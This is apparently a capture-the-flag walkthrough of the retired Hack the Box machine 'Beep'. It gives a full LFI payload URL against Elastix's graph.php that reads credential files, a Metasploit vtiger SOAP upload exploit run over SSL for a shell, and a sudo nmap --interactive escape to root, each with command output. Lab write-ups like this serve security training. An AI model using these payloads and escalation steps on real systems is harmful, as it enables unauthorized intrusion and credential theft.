Hack the Box – Beep Walkthrough

Today we’re going to solve another CTF machine “Beep. It is now a retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: 22,25,80,110,111,143,443,993,995,3306,4445,10000
  • IP Address: 10.10.10.7
  • Difficulty: Medium

Weakness

  • LFI vulnerablity
  • Sudo NOPASSWD

Contents

  • Getting user
  • Getting root

Table of Contents

Reconnaissance

Ports Scanning

Enumerate Directories

Method 2

Port Scanning

Enumerate Directories

Privilege Escalation

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.7 22 tcp ssh open OpenSSH 4.3 protocol 2.0 10.10.10.7 25 tcp smtp open Postfix smtpd 10.10.10.7 80 tcp http open Apache httpd 2.2.3 10.10.10.7 110 tcp pop3 open Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 111 tcp rpcbind open 2 RPC #100000 10.10.10.7 143 tcp imap open Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 443 tcp ssl/http open Apache httpd 2.2.3 (CentOS) 10.10.10.7 993 tcp ssl/imap open Cyrus imapd 10.10.10.7 995 tcp pop3 open Cyrus pop3d 10.10.10.7 3306 tcp mysql open MySQL unauthorized 10.10.10.7 4445 tcp upnotifyp open 10.10.10.7 10000 tcp http open MiniServ 1.570 Webmin httpd

We have a quite long list of services. HTTP is running so this is our primary target now.

Enumerate Directories

We a huge list of directories because there’s a Elastix CMS installed on Apache.

Let’s searchsploit elastix,

To read

searchsploit -x php/webapps/37637.pl

To copy exploit to current directory

searchsploit -m php/webapps/37637.pl . Exploit: Elastix 2.2.0 - ‘graph.php’ Local File Inclusion URL: Elastix 2.2.0 - 'graph.php' Local File Inclusion - PHP webapps Exploit Path: /usr/share/exploitdb/platforms/php/webapps/37637.pl Copied to: /root/Documents/hackthebox/10.10.10.7/37637.pl

The proof of concept is extremely simple. Browsing to https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action will expose the credentials for AMPortal.

The box is vulnerable to password reuse, and it is possible to SSH in directly as the root user with the AMPDBPASS password.

Method 2

There’s another method to hack this box. Let’s start over again.

Port Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.7 22 tcp ssh open OpenSSH 4.3 protocol 2.0 10.10.10.7 25 tcp smtp open Postfix smtpd 10.10.10.7 80 tcp http open Apache httpd 2.2.3 10.10.10.7 110 tcp pop3 open Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 111 tcp rpcbind open 2 RPC #100000 10.10.10.7 143 tcp imap open Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 443 tcp ssl/http open Apache httpd 2.2.3 (CentOS) 10.10.10.7 993 tcp ssl/imap open Cyrus imapd 10.10.10.7 995 tcp pop3 open Cyrus pop3d 10.10.10.7 3306 tcp mysql open MySQL unauthorized 10.10.10.7 4445 tcp upnotifyp open 10.10.10.7 10000 tcp http open MiniServ 1.570 Webmin httpd

We have a quite long list of services. HTTP is running so this is our primary target now.

Enumerate Directories

We a huge list of directories because there’s a Elastix CMS installed on Apache.

We have a login field either we can brute force or find an SQL injection vulnerability i tested both but unable to find them.

Let’s dig more into directories and see if we can find anything.

https://10.10.10.7/vtigercrm/

We can see another login portal for vtiger CRM 5.1.0 The first thing we should do is searchsploit vtiger.

So we found some metasploit modules as well let’s test them first to save our time.

msf > search vtiger Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/vtiger_install_rce 2014-03-05 manual Vtiger Install Unauthenticated Remote Command Execution exploit/multi/http/vtiger_php_exec 2013-10-30 excellent vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution exploit/multi/http/vtiger_soap_upload 2013-03-26 excellent vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload

We found our exploit let’s use it.

use exploit/multi/http/vtiger_soap_upload

After executing exploit we got an error let’s take a look at.

If you remember we have an SSL installed on server as well and this exploit also have an option to support SSL. Let’s enable it.

msf exploit(vtiger_soap_upload) > set SSL true msf exploit(vtiger_soap_upload) > set RPORT 443

After executing we got an shell

Inside /home/fanis directory we have found our user.txt flag.

Privilege Escalation

It’s time to get root.txt now we can use privilege escalation scripts to gather information or we can do some research manually first to save our time.

If you do sudo -l you can see many NOPASSWD commands which can lead us to getting root.

sudo -l Matching Defaults entries for asterisk on this host: env_reset, env_keep=“COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY” User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper

There’s nmap and if you google nmap privilege escalation you can find this command

sudo nmap --interactive Starting Nmap V. 4.11 ( Nmap: the Network Mapper - Free Security Scanner ) Welcome to Interactive Mode – press h for help nmap> !sh id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) cd /root ls -la total 16308 drwxr-x— 2 root root 4096 Apr 7 2017 . drwxr-xr-x 22 root root 4096 Dec 2 23:23 … -rw------- 1 root root 1130 Dec 4 13:06 .bash_history -rw-r–r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r–r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r–r-- 1 root root 176 Jan 6 2007 .bashrc -rw-r–r-- 1 root root 100 Jan 6 2007 .cshrc -rw-r–r-- 1 root root 129 Jan 6 2007 .tcshrc -rw------- 1 root root 6025 Apr 7 2017 anaconda-ks.cfg -r-xr-xr-x 1 root root 190461 Aug 10 2011 elastix-pr-2.2-1.i386.rpm -rw-r–r-- 1 root root 18433 Apr 7 2017 install.log -rw-r–r-- 1 root root 0 Apr 7 2017 install.log.syslog -rw-r–r-- 1 root root 1 Apr 7 2017 postnochroot -rw------- 1 root root 33 Apr 7 2017 root.txt -r-xr-xr-x 1 root root 16358730 Oct 31 2011 webmin-1.570-1.noarch.rpm